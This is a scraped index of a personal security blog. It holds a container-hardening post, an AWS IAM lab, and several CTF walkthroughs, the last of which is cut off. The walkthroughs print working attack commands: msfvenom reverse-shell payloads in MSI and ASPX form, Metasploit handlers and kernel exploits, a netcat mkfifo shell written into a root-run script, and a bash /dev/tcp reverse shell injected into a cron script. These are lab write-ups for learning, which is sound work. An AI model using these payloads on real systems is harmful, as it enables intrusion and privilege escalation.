[{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/aws/","section":"Tags","summary":"","title":"AWS"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/","section":"Categories","summary":"","title":"Categories"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/cis-benchmark/","section":"Tags","summary":"","title":"CIS Benchmark"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/cloud-security/","section":"Categories","summary":"","title":"Cloud Security"},{"content":"From Docker to EKS: Stage 1 | Container Image Security Baseline #Series: From Docker to EKS: A Security-First Progression\nMany companies have already made the push towards containerizing applications in their production environments, with Kubernetes as the prevalent platform for cloud-native deployments. The real challenge involves ensuring that their containerized workloads are secure from the start.\nI started this container security project series to fill that gap for myself. I wanted to learn not just how containers work, but how to deploy them securely at every step. Every decision about container image security controls, every tradeoff, every pipeline control, and every CVE became part of my process.\nWith this project, I document my approach throughout this progression. I start out with a secure Docker image, which will next be deployed to AWS Elastic Container Service (ECS) via Fargate mode, and eventually to AWS Elastic Kubernetes Service (EKS). I aim to show how my security decisions evolved as the project environment grew.\nThe container image is where much of that foundation gets built, and security problems introduced at the image layer become harder to address through orchestration controls alone. These may include unpatched packages, a root process, a secret that got baked into the build, to name a few.\nThe Workload #I needed a reliable application for all three stages of this project, so I could focus on security controls rather than application logic. I chose Python FastAPI because I had already used it during the Learn to Cloud Capstone project, so it was familiar enough that I could move quickly without getting distracted by application development. It\u0026rsquo;s also lightweight, realistic enough to simulate a real workload, and it generates API documentation automatically, making it easier to use.\nThree endpoints. That\u0026rsquo;s it:\n/health \u0026ndash; returns service health status /status \u0026ndash; returns app name, version, and current stage /docs \u0026ndash; FastAPI-generated interactive API documentation endpoint The application remains the same at every stage of this project. What changes are in the infrastructure and security around it. That is the point.\nThe Dockerfile Decisions #Most Docker tutorials I\u0026rsquo;ve completed only showed how to get an app running. My goal was to learn how to run it securely, with security built into the image from the start. Here\u0026rsquo;s my Dockerfile with the main security decisions explained:\nWhile working through this project and learning more about application container security, I noticed that many of these decisions aligned with principles from the 12 Factor App methodology, a set of guidelines for building modern, cloud-native web applications.\n# ---- Build Stage ---- # python:3.11-slim is used ONLY for building -- it never ships to production FROM python:3.11-slim AS builder WORKDIR /build COPY app/requirements.txt . # Install dependencies into an isolated folder # They get copied to the runtime stage -- build tools stay behind RUN pip install --no-cache-dir --upgrade pip \\ \u0026amp;\u0026amp; pip install --no-cache-dir -r requirements.txt --target /build/deps # ---- Runtime Stage ---- # Distroless: no shell, no package manager, no perl, no bash # Only the Python runtime and what your app actually needs FROM gcr.io/distroless/python3-debian12 AS runtime WORKDIR /app # Copy only the installed dependencies -- not pip, not build tools COPY --from=builder /build/deps /app/deps # Copy application source COPY app/ . # Tell Python where to find the dependencies ENV PYTHONPATH=/app/deps # Distroless ships with a built-in nonroot user at UID 65532 # Drop to it here -- if the container is compromised, the attacker is not root USER nonroot EXPOSE 8000 # Health check so ECS and EKS have something to probe HEALTHCHECK --interval=30s --timeout=5s --start-period=10s --retries=3 \\ CMD [\u0026#34;python3\u0026#34;, \u0026#34;-c\u0026#34;, \u0026#34;import urllib.request; urllib.request.urlopen(\u0026#39;http://localhost:8000/health\u0026#39;)\u0026#34;] # No shell in distroless -- run uvicorn directly via the Python module flag CMD [\u0026#34;-m\u0026#34;, \u0026#34;uvicorn\u0026#34;, \u0026#34;app:app\u0026#34;, \u0026#34;--host\u0026#34;, \u0026#34;0.0.0.0\u0026#34;, \u0026#34;--port\u0026#34;, \u0026#34;8000\u0026#34;, \u0026#34;--no-access-log\u0026#34;] While going through the Dockerfile decisions during this project and reading through Liz Rice\u0026rsquo;s Container Security, I came to understand the security reasoning behind each one. The multi-stage build keeps build tools and package managers out of the production image. The distroless runtime reduces the attack surface by removing shells, package managers, and extra utilities that have no place in a production container. Running as a non-root user limits what an attacker can do if the container is ever compromised. The HEALTHCHECK gives orchestration platforms a way to detect and respond to unhealthy containers automatically.\nOne thing that stood out to me was how the no-secrets-in-image pattern connects to Factor III of the 12 Factor App methodology, strengthening the idea that configuration that varies between deployments should live in the environment, not directly in the code or the image. The .dockerignore file, which excludes .env files, and the environment variable pattern in the Dockerfile are direct implementations of that principle. I didn\u0026rsquo;t set out to implement 12 Factor, but I learned some of these patterns as I built the project. Identifying the connection afterward was one of those moments where concepts from different disciplines started to click together. Having worked previously in RMF and ATO processes, I have seen these principles documented as security controls: least privilege, configuration management, and attack surface minimization. However, this was the first time I had implemented them at the container layer rather than assessed them. That shift from evaluator to builder gave me a different appreciation for why these controls exist.\nWhile these decisions do not make a container fully secure on their own, when used together, they reduce the attack surface and create a more defensible baseline.\nThe First Scan: 105 CVEs #Before switching to distroless, I was using python:3.12-slim as the base image. I ran Trivy against it and got this:\nTotal: 105 (UNKNOWN: 4, LOW: 63, MEDIUM: 29, HIGH: 7, CRITICAL: 2) Two CRITICAL severity level vulnerabilities. Both in perl-base.\nMy app is a Python API, not a Perl one. However, python:3.12-slim included it anyway because slim images, while smaller than full OS images, still carry packages your app never requested. This created an issue because I ended up with a bigger attack surface than I wanted and could not remove it without rebuilding the image or changing base images entirely.\nThe HIGH findings were spread across ncurses, libpython, and several util-linux packages. Most of these weren\u0026rsquo;t directly related to running this application and just made the runtime footprint bigger than needed.\nThis is what a so-called \u0026ldquo;minimal\u0026rdquo; base image can look like if you\u0026rsquo;re not careful. There were 105 findings, most from packages that were unnecessary for this workload.\nThis issue is not theoretical for me. I recall having worked through Log4j remediation actions on systems where the lesson was the same: bundled software that teams did not intentionally choose still became software they had to secure.\nThat experience shaped how I approached this container image design. Decreasing unnecessary dependencies earlier in the build process means there is less software to patch, track, and defend later.\nThe Distroless Decision #Switching to gcr.io/distroless/python3-debian12 immediately removed most of the extra packages I did not need. The result was 7 remaining OS findings and 0 vulnerabilities at the CRITICAL severity level. No Perl, no bash, no package manager, and no shell.\nDistroless images remove many of the components that are unnecessary at runtime while keeping the dependencies your application actually needs.\nHowever, there are tradeoffs.\nWithout a shell and package manager, these images are intentionally more restrictive than traditional container images. In my case, the biggest tradeoff showed up during vulnerability management. When fixes for base image packages became available upstream, I had to wait for updated distroless image releases before those fixes were available to me. That is exactly the situation I ran into, which I cover in the accepted risk section below.\nFor production workloads, the tradeoff seemed worth it. Reducing the number of unneeded components means reducing the amount of software that can become your responsibility to patch, monitor, and defend later.\nThe Dependency Treadmill #After switching to distroless, my Python package scan still showed a HIGH-severity CVE in starlette. My first thought was to pin the package directly in requirements.txt. That failed because FastAPI manages starlette as a transitive dependency \u0026ndash; a package I never installed directly, but one that FastAPI pulled in automatically as part of its own requirements \u0026ndash; and wouldn\u0026rsquo;t accept my pin:\nERROR: Cannot install -r requirements.txt (line 1) and starlette==0.40.0 because these package versions have conflicting dependencies. fastapi 0.115.0 depends on starlette\u0026lt;0.39.0 and \u0026gt;=0.37.2 I was able to resolve this by upgrading FastAPI to version 0.136.3, which uses a patched version of starlette. That resolved the remaining Python package findings at that time.\nThe lesson here is that you can\u0026rsquo;t always remediate transitive dependencies directly. If a vulnerable package is not something you explicitly installed, look at which dependency introduced it and upgrade there first.\nThe harder lesson is that vulnerability management never really stops. The day after I resolved the starlette HIGH finding, another CVE appeared with a different identifier.\nAt some point, you have to decide when to stop chasing every new finding and start documenting the risk you are willing to accept.\nAccepted Risk and the .trivyignore Approach #After all the remediation work, two HIGH findings remained. Both were in the distroless base image itself, not in my application code or Python dependencies. The fixes for both CVEs already existed upstream, meaning the software maintainers had already released patched versions of the affected packages. The problem was that Google had not yet published an updated distroless image digest that included those patches. Without a package manager inside the distroless image, there was no way to apply the fixes manually. I had to wait for Google to release an updated image.\nAt that point, I had two options:\nLower the pipeline severity threshold so the findings no longer fail the build Keep the threshold and formally document the accepted risk I chose the second option.\nLowering the threshold hides risk and makes pipeline results less meaningful. Therefore, I created a .trivyignore file to document the CVE identifiers, justification, and remediation status:\n# CVE-2026-40356 - krb5 DoS via integer underflow # Fix available in 1.20.1-2+deb12u5 but not yet included in distroless base image # Tracked: pending distroless image update CVE-2026-40356 # CVE-2025-13836 - cpython excessive read buffering DoS in http.client # Fix available in 3.11.2-6+deb12u7 but not yet included in distroless base image # Tracked: pending distroless image update CVE-2025-13836 This creates an auditable record. Anyone reviewing the repository can see exactly what was accepted, why it was accepted, and what the intended remediation path looks like. This approach is consistent with how accepted risk is handled in formal RMF processes. Risk that cannot be immediately mitigated is documented, assigned an owner, and tracked for remediation rather than ignored or obscured. The .trivyignore file applies that same discipline at the pipeline level.\nAfter applying the ignore file, the scan passed with all remaining findings documented as accepted risk.\nThe Pipeline #The GitHub Actions pipeline does four things whenever changes are pushed to app/ or stage-1-docker/:\nChecks out the repository code Builds the Docker image Runs Trivy with --ignore-unfixed and the .trivyignore file applied Uploads the scan results as a pipeline artifact The --ignore-unfixed flag is important because it tells Trivy to fail builds only when remediation exists. Failing builds for vulnerabilities without available fixes creates alert fatigue, and eventually people stop paying attention to pipeline failures.\nPublishing the scan results as artifacts means that every scan is retained and auditable. You can download reports from previous runs and see what vulnerabilities existed when a particular image was built.\nNIST 800-53 Controls Implemented #Part of my goal for this project was to map security decisions to NIST 800-53 controls. I wanted to connect implementation choices to the compliance standard that I work with professionally. The implementation decisions in this project are grounded in NIST SP 800-190 (Application Container Security Guide), which is the NIST publication specifically focused on container security. DoD environments have additional requirements governed by DISA STIGs and the Container Platform SRG. Here\u0026rsquo;s what Stage 1 covers:\nControl Implementation AC-6 Least Privilege Non-root user (UID 65532) enforced at runtime CM-6 Configuration Settings Dockerfile enforces a standardized, repeatable configuration CM-7 Least Functionality Distroless base with no shell, no package manager, and only port 8000 exposed RA-5 Vulnerability Scanning Trivy scans on every pipeline run SA-11 Developer Testing Automated security testing gates every pipeline run, results stored as artifacts SI-2 Flaw Remediation CVE threshold gates pipeline success, accepted risks documented in .trivyignore The full control mapping is maintained in compliance/nist-800-53-mapping.md in the project repo.\nAfter completing Stage 1, I developed a STRIDE-based threat model to formally document the threats this architecture addresses. That document lives in the \u0026lsquo;project repo\u0026rsquo;.\nWhat I Learned #A few honest takeaways from Stage 1:\nChoose distroless early if your workload supports it. Keeping python:3.11-slim in the build stage still made sense for dependency installation, but using it as my runtime image introduced unnecessary rework and additional vulnerabilities I later had to remove.\nCVE remediation is a process, not a one-time goal. This one was more of a reminder to me. New CVEs are found all the time. The goal isn\u0026rsquo;t zero findings, but to have a mature, documented response to the ones you do have.\nThe pipeline becomes the enforcement mechanism. Writing a secure Dockerfile is important, but without a pipeline that checks it on every push, you\u0026rsquo;re relying on people to always make the right security choices. Automated, secure defaults are more reliable than expecting people to get it right every time.\nWorking through this project also helped me see how the 12 Factor App concepts and container security reinforce each other. Factors like explicit dependencies and environment-based configuration contribute to both good application design and a smaller attack surface.\nWhat\u0026rsquo;s Next #Stage 2 uses this secured image and deploys it to Amazon ECS in Fargate mode using OpenTofu for Infrastructure as Code (IaC). I\u0026rsquo;ll add task role and execution role separation, integrate with Secrets Manager, set up a private VPC, and expand the pipeline to include Checkov and Gitleaks.\nThe NIST control mapping is extended with each stage. By Stage 3 (EKS), I plan to have Kyverno admission policies, Falco runtime detection, and GuardDuty all mapped to controls.\nThe full project is on GitHub: github.com/nisha318/container-security-progression\nTags: Docker, Container Security, DevSecOps, NIST 800-53, Trivy, GitHub Actions, Distroless, FastAPI, Cloud Engineering, CIS Benchmark\n","date":"May 31, 2026","permalink":"https://notesbynisha.com/posts/2026-05-31-container-security-starts-before-the-cloud/","section":"Writing","summary":"How I established a container image security baseline using distroless, Trivy, and GitHub Actions before touching any cloud infrastructure.","title":"Container Security Starts Before the Cloud"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/containers/","section":"Tags","summary":"","title":"Containers"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/devsecops/","section":"Categories","summary":"","title":"DevSecOps"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/devsecops/","section":"Tags","summary":"","title":"DevSecOps"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/distroless/","section":"Tags","summary":"","title":"Distroless"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/docker/","section":"Tags","summary":"","title":"Docker"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/fastapi/","section":"Tags","summary":"","title":"FastAPI"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/github-actions/","section":"Tags","summary":"","title":"GitHub Actions"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/nist-800-53/","section":"Tags","summary":"","title":"NIST 800-53"},{"content":"","date":null,"permalink":"https://notesbynisha.com/","section":"Notes by Nisha","summary":"","title":"Notes by Nisha"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/","section":"Tags","summary":"","title":"Tags"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/trivy/","section":"Tags","summary":"","title":"Trivy"},{"content":"","date":null,"permalink":"https://notesbynisha.com/posts/","section":"Writing","summary":"","title":"Writing"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/aws/","section":"Categories","summary":"","title":"AWS"},{"content":"Introduction #This walkthrough covers a practical AWS lab focused on troubleshooting IAM access issues. The scenario mirrors a common situation in cloud operations where users must assume roles to perform their tasks, rather than having direct permissions assigned. The objective is to identify why a user cannot assume an assigned role and apply a least privilege fix.\nScenario Overview #In this lab, a new IAM user named Operator-User cannot assume a role named Operator-Role. As part of the cloud team, your job is to find out what is wrong and fix it.\nThe issue affects the user\u0026rsquo;s ability to:\nAssume a role through the AWS Management Console Access an EC2 instance using AWS Systems Manager Session Manager The root of such problems often lies in a mismatch between:\nThe user’s permissions (identity-based policy) The role’s trust relationship (trust policy) Step 1. Reproduce the Problem #To begin, log in as Operator-User and attempt to switch roles from the AWS Management Console.\nChoose the user menu in the top-right corner and select Switch Role. Enter the Account ID and Role Name (Operator-Role). Leave the display name blank and click Switch Role. If you see an error message such as “Invalid information in one or more fields”, you have confirmed that the role assumption is failing.\nScreenshot 1: The “Invalid information” error displayed when attempting to switch roles.\nThis validation step ensures that any later fix can be verified against the same failure.\nStep 2. Review the User’s Permissions #Next, return to the console signed in as AWSLabUser (the admin account provided for troubleshooting). Navigate to IAM \u0026gt; Users \u0026gt; Operator-User \u0026gt; Permissions and review the attached policy.\nYou will likely find that the user does not have the sts:AssumeRole action included in the permissions policy. This action is required for a user to assume another role through the AWS Security Token Service (STS).\nRemediation:\nEdit the user policy to include the sts:AssumeRole action. Limit the Resource to only the Operator-Role ARN to enforce least privilege. Example policy snippet:\n{ \u0026#34;Version\u0026#34;: \u0026#34;2012-10-17\u0026#34;, \u0026#34;Statement\u0026#34;: [ { \u0026#34;Effect\u0026#34;: \u0026#34;Allow\u0026#34;, \u0026#34;Action\u0026#34;: \u0026#34;sts:AssumeRole\u0026#34;, \u0026#34;Resource\u0026#34;: \u0026#34;arn:aws:iam::\u0026lt;account-id\u0026gt;:role/Operator-Role\u0026#34; } ] } ","date":"November 1, 2025","permalink":"https://notesbynisha.com/posts/2023-01-24-troubleshooting-iam-access-issues-in-aws/","section":"Writing","summary":"Learn how to troubleshoot IAM role assumption failures by aligning identity-based policies and trust relationships while maintaining least privilege.","title":"AWS Lab Walkthrough: Troubleshooting IAM Access Issues"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/iam/","section":"Categories","summary":"","title":"IAM"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/troubleshooting/","section":"Categories","summary":"","title":"Troubleshooting"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/alwaysinstallelevated/","section":"Tags","summary":"","title":"Alwaysinstallelevated"},{"content":"🧠 Summary #In this walkthrough, I exploited the AlwaysInstallElevated privilege escalation technique on a vulnerable Windows machine. When both HKLM and HKCU registry keys for AlwaysInstallElevated are set to 1, any .msi file executed by a standard user will run with SYSTEM-level privileges. Below is a step-by-step breakdown of how I leveraged this misconfiguration to gain SYSTEM access.\n🔍 Step 1: Confirming Registry Vulnerability #After gaining initial access to the target machine, I checked the registry for AlwaysInstallElevated values:\nreg query HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer reg query HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer Registry keys confirming AlwaysInstallElevated is enabled Both were set to 0x1, confirming the system is vulnerable.\n💣 Step 2: Creating a Malicious MSI Payload #On my Kali attack box, I generated a reverse Meterpreter payload in MSI format using msfvenom:\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.2.119.123 -f msi -o setup.msi MSFVenom command to generate the setup.msi payload 🌐 Step 3: Hosting the Payload #I used Python to host the .msi file over HTTP:\npython3 -m http.server 80 HTTP server log showing the victim downloading setup.msi 📥 Step 4: Downloading and Executing on Victim Machine #On the victim machine, I opened Internet Explorer and navigated to the Kali host IP to download the payload.\nPayload download via Internet Explorer 🧠 Step 5: Listener Setup and Shell Access #On my Kali box, I launched a Metasploit listener to catch the reverse shell:\nmsfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 10.2.119.123 run Confirmed SYSTEM-level Meterpreter shell from payload execution The payload executed with SYSTEM privileges, as confirmed by the getuid command.\n🛡️ Mitigation #To prevent this type of privilege escalation:\nSet AlwaysInstallElevated to 0 in both HKLM and HKCU: reg add HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f Restrict user ability to run .msi installers Use endpoint monitoring to alert on privilege escalations 🔗 MITRE ATT\u0026amp;CK Mapping # T1548.002 – Abuse Elevation Control Mechanism: Bypass User Access Control ✅ Success: I escalated from user to SYSTEM by abusing AlwaysInstallElevated and a malicious MSI payload. Always validate registry settings during post-exploitation recon!\nStay sharp, and happy hacking! 🛠️\n","date":"May 6, 2025","permalink":"https://notesbynisha.com/posts/2025-05-06-alwaysinstallelevated-walkthrough/","section":"Writing","summary":"A walkthrough of exploiting the AlwaysInstallElevated misconfiguration on Windows to escalate from user to SYSTEM using a malicious MSI payload.","title":"Exploiting AlwaysInstallElevated for Windows Privilege Escalation"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/metasploit/","section":"Tags","summary":"","title":"Metasploit"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/msfvenom/","section":"Tags","summary":"","title":"Msfvenom"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/pentesting/","section":"Tags","summary":"","title":"Pentesting"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/privilege-escalation/","section":"Categories","summary":"","title":"Privilege Escalation"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/privilege-escalation/","section":"Tags","summary":"","title":"Privilege-Escalation"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/tryhackme/","section":"Tags","summary":"","title":"Tryhackme"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/tryhackme/","section":"Categories","summary":"","title":"TryHackMe"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/windows/","section":"Categories","summary":"","title":"Windows"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/windows/","section":"Tags","summary":"","title":"Windows"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/blog/","section":"Categories","summary":"","title":"Blog"},{"content":"🧠 Summary # Target OS: Windows Server 2008 R2 Difficulty: Easy IP Address: 10.129.249.251 Initial Access Vector: FTP upload to WebDAV Privilege Escalation Vector: Kernel exploit (MS15-051) Tools Used: Nmap, Metasploit, msfvenom 🛰️ Reconnaissance #I began with a full port scan using Nmap:\nnmap -p- -A -T4 10.129.249.251 🔍 Results: # Port 21 (FTP):\nMicrosoft ftpd Anonymous login allowed Files: aspnet_client/, iisstart.htm, welcome.png Port 80 (HTTP):\nMicrosoft IIS httpd 7.5 TRACE method enabled OS Guess: Windows Server 2008 R2 / Windows 7 SP1 🌐 Web Server Enumeration #I browsed the site directly via:\nhttp://10.129.249.251 The page showed the default IIS7 welcome page, confirming a likely upload path vulnerability via FTP to the webroot.\n🎯 Initial Foothold #I generated a reverse shell in ASPX format:\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.XX LPORT=4444 -f aspx \u0026gt; shell.aspx Uploaded it via FTP (anonymous login):\nftp 10.129.249.251 put shell.aspx Then triggered it in the browser:\nhttp://10.129.249.251/shell.aspx Metasploit caught the reverse shell with a listener:\nuse exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 10.10.14.XX set LPORT 4444 run 📈 Privilege Escalation #Step 1: Checked for Kernel Exploits #systeminfo Identified Windows Server 2008 R2 SP1 — vulnerable to MS10-015 and MS15-051.\nStep 2: Attempted MS10-015 #use exploit/windows/local/ms10_015_kitrap0d set SESSION \u0026lt;meterpreter session\u0026gt; run But the exploit failed — I forgot to set the correct LHOST and Metasploit defaulted to eth0 instead of my tun0. After troubleshooting, I pivoted.\nStep 3: Successful Exploit with MS15-051 #use exploit/windows/local/ms15_051_client_copy_image set SESSION \u0026lt;meterpreter session\u0026gt; set LHOST 10.10.14.XX run This successfully gave me SYSTEM shell.\n🏁 Capture the Flags #type C:\\Users\\\u0026lt;user\u0026gt;\\Desktop\\user.txt type C:\\Users\\Administrator\\Desktop\\root.txt 🧩 MITRE ATT\u0026amp;CK Mapping # Tactic Technique Initial Access T1078.001 - Valid Accounts: Local Accounts Execution T1059.005 - Command and Scripting Interpreter: Visual Basic Priv. Esc. T1068 - Exploitation for Privilege Escalation Discovery T1082 - System Information Discovery Persistence T1053.005 - Scheduled Task/Job: Scheduled Task ","date":"April 22, 2025","permalink":"https://notesbynisha.com/posts/2025-04-22-devel-rooted-walkthrough/","section":"Writing","summary":"This post is a walkthrough of the \u0026lsquo;Devel\u0026rsquo; retired machine from Hack The Box. I gain initial access through an exposed FTP and WebDAV setup, then escalate privileges using MS15-051.","title":"Devel Rooted: A Hack The Box Walkthrough"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/ftp/","section":"Tags","summary":"","title":"Ftp"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/hackthebox/","section":"Tags","summary":"","title":"Hackthebox"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/hackthebox/","section":"Categories","summary":"","title":"HackTheBox"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/initial-access/","section":"Tags","summary":"","title":"Initial-Access"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/webdav/","section":"Tags","summary":"","title":"Webdav"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/ctf/","section":"Tags","summary":"","title":"CTF"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/cybersecurity/","section":"Tags","summary":"","title":"Cybersecurity"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/enumeration/","section":"Tags","summary":"","title":"Enumeration"},{"content":"Overview #This walkthrough demonstrates how I exploited the LazyAdmin room on TryHackMe. Each section includes detailed explanations of the enumeration, exploitation, and privilege escalation processes.\n🎯 Privilege Escalation Summary:\nVector: Misconfigured sudo permissions on a Perl script (backup.pl) Exploitation Technique: Abuse of a vulnerable shell script (/etc/copy.sh) to execute a reverse shell Result: Full root access via a reverse shell connection 🕵️ Initial Enumeration #I began by performing a full port scan to identify open services:\nnmap -p- -T4 -A 10.10.95.27 The results revealed two open ports:\nPort 22: SSH Port 80: HTTP (Apache) Navigating to http://10.10.95.27 on port 80 returned the default Apache2 Ubuntu page:\n🌐 Web Enumeration #Checking robots.txt #I checked the robots.txt file at http://10.10.95.27/robots.txt, which returned “Not Found.” However, I was able to gather the Apache version Apache/2.4.18, which could be useful for identifying potential exploits.\nDirectory Busting with FFuF #I then performed directory enumeration using FFuF:\nffuf -w /usr/share/wordlists/dirb/common.txt -u \u0026#39;http://10.10.95.27/FUZZ\u0026#39; This revealed an interesting directory named /content.\nTo validate my results, I ran another directory search using dirsearch:\n📚 Vulnerability Research #After identifying the CMS as SweetRice 1.5.1, I searched for public exploits. I discovered two interesting vulnerabilities:\n1. Backup Disclosure (Exploit-DB 40718) #https://www.exploit-db.com/exploits/40718\nThis exploit allows attackers to access sensitive MySQL backups stored in an unprotected directory.\nProof of Concept (PoC):\nYou can access all MySQL backups and download them from this directory: http://localhost/inc/mysql_backup You can also access website file backups from: http://localhost/SweetRice-transfer.zip 2. Arbitrary File Upload (Exploit-DB 40716) #https://www.exploit-db.com/exploits/40716\nThis exploit highlights a file upload vulnerability that allows attackers to upload malicious files and gain code execution.\n# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload # Exploit Author: Ashiyane Digital Security Team # Date: 03-11-2016 import requests from requests import session # Exploit attempts to upload a file via /as directory login = r.post(\u0026#39;http://\u0026#39; + host + \u0026#39;/as/?type=signin\u0026#39;, data=payload) # Targeted upload endpoint and accepted formats (.php5 included) uploadfile = r.post(\u0026#39;http://\u0026#39; + host + \u0026#39;/as/?type=media_center\u0026amp;mode=upload\u0026#39;, files=file) The code showed that we needed to target the /as directory for the portal login and that .php5 was an accepted file format for uploading malicious payloads.\n📂 SweetRice Backup Disclosure Exploit #Following the Backup Disclosure PoC, I navigated to the following directory:\nhttp://10.10.95.27/content/inc/mysql_backup/ This exposed a MySQL backup file which I downloaded and examined.\n🔎 Extracting Credentials #I analyzed the backup file and discovered a hashed password.\nDescription\\\u0026#34;;s:5:\\\u0026#34;admin\\\u0026#34;;s:7:\\\u0026#34;manager\\\u0026#34;;s:6:\\\u0026#34;passwd\\\u0026#34;;s:32:\\\u0026#34;42f749ade7f9e195bf475f37a44cafcb I used CrackStation to crack the hash and obtained the password:\nPassword: Password123 🔐 CMS Login \u0026amp; Shell Upload #With valid credentials (manager:Password123), I logged into the CMS via:\nhttp://10.10.95.27/content/as/ 🎯 Uploading a Reverse Shell #After logging in, I navigated to the Media Center where I had the ability to upload files.\nI prepared a PHP reverse shell from PentestMonkey and modified it with my Kali IP and port:\nhttps://github.com/pentestmonkey/php-reverse-shell\nnano shell.php5 Started a listener on port 7777:\nnc -lvnp 7777 Uploaded and triggered the payload:\n🐚 Gaining Foothold #I received a shell as www-data and began local enumeration:\nwhoami id sudo -l 🏗️ Privilege Escalation via Misconfigured sudo Permissions #Reviewing Backup Script (backup.pl) #I discovered that I had sudo permissions to run backup.pl as root.\ncat /home/itguy/backup.pl The script referenced /etc/copy.sh, which contained a reverse shell.\ncat /etc/copy.sh 🚀 Overwriting copy.sh to Gain Root #I overwrote copy.sh with a reverse shell payload:\necho \u0026#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2\u0026gt;\u0026amp;1 | nc 10.10.95.27 5554 \u0026gt; /tmp/f\u0026#34; \u0026gt; /etc/copy.sh 📡 Catching the Root Shell #Set up a new listener on port 5554:\nnc -lvnp 5554 Triggered the reverse shell as root:\n🎉 Conclusion #LazyAdmin was an exciting machine that demonstrated various critical exploitation techniques:\nDiscovered a MySQL backup disclosure vulnerability Cracked admin credentials to gain access to the CMS Uploaded and triggered a PHP reverse shell Gained root through misconfigured sudo permissions on a backup script Happy hacking! 🧠💻🔥\nTry the LazyAdmin room on TryHackMe\n","date":"March 27, 2025","permalink":"https://notesbynisha.com/posts/2025-03-27-lazyadmin-tryhackme-walkthrough/","section":"Writing","summary":"A complete walkthrough of the LazyAdmin room on TryHackMe, demonstrating enumeration, exploitation, and privilege escalation.","title":"LazyAdmin TryHackMe Walkthrough"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/linux-privilege-escalation/","section":"Tags","summary":"","title":"Linux Privilege Escalation"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/reverse-shell/","section":"Tags","summary":"","title":"Reverse Shell"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/web-exploits/","section":"Tags","summary":"","title":"Web Exploits"},{"content":"Introduction #The Anonymous room on TryHackMe presents a classic CTF-style Linux machine that\u0026rsquo;s ideal for practicing enumeration, lateral thinking, and privilege escalation. In this walkthrough, I’ll guide you through how I leveraged a misconfigured FTP service and an insecure cleanup script to gain a reverse shell on the target system — and how a single misconfigured binary handed me root.\nRoom URL: https://tryhackme.com/room/anonymous\nReconnaissance #As always, I started with network enumeration to get the lay of the land. I launched an aggressive Nmap scan to discover open ports and services running on the target machine.\nsudo nmap -p- -T4 -A 10.10.64.179 Results Summary # Port 21 (FTP): vsftpd 2.0.8 — anonymous login enabled Port 22 (SSH): OpenSSH 7.6p1 on Ubuntu 18.04 Ports 139/445 (SMB): Samba smbd 4.7.6-Ubuntu, guest access These results told me two things: there were likely multiple avenues for initial access — and anonymous FTP looked especially promising.\nGaining Entry Through Anonymous FTP #Connecting to the FTP server revealed a writable scripts directory — a big red flag.\nftp 10.10.64.179 ftp\u0026gt; cd scripts ftp\u0026gt; ls I downloaded everything I could using binary mode to avoid corrupting file contents:\nftp\u0026gt; binary ftp\u0026gt; mget * I had three files to analyze:\nclean.sh removed_files.log to_do.txt Reviewing Downloaded Files #Opening to_do.txt gave a hint that FTP access was likely unintentional:\nI really need to disable the anonymous login ... it\u0026#39;s really not safe The removed_files.log showed a repeated message:\nRunning cleanup script: nothing to delete The third file, clean.sh, was the most interesting — a bash script designed to remove temp files. Critically, it had world-writable permissions and appeared to be executed on a schedule.\ncat clean.sh Reverse Shell via Writable Script #Since clean.sh was writable and likely auto-executed, I weaponized it by inserting a reverse shell payload targeting my attack machine:\n#!/bin/bash bash -i \u0026gt;\u0026amp; /dev/tcp/10.13.79.36/7777 0\u0026gt;\u0026amp;1 I started a Netcat listener and re-uploaded my modified script:\nnc -nlvp 7777 ftp\u0026gt; put clean.sh Seconds later, I caught a shell back.\nwhoami namelessone ✅ I now had an interactive shell on the target as user namelessone.\nLocal Enumeration and Flag Hunting #First, I confirmed my identity and inspected the home 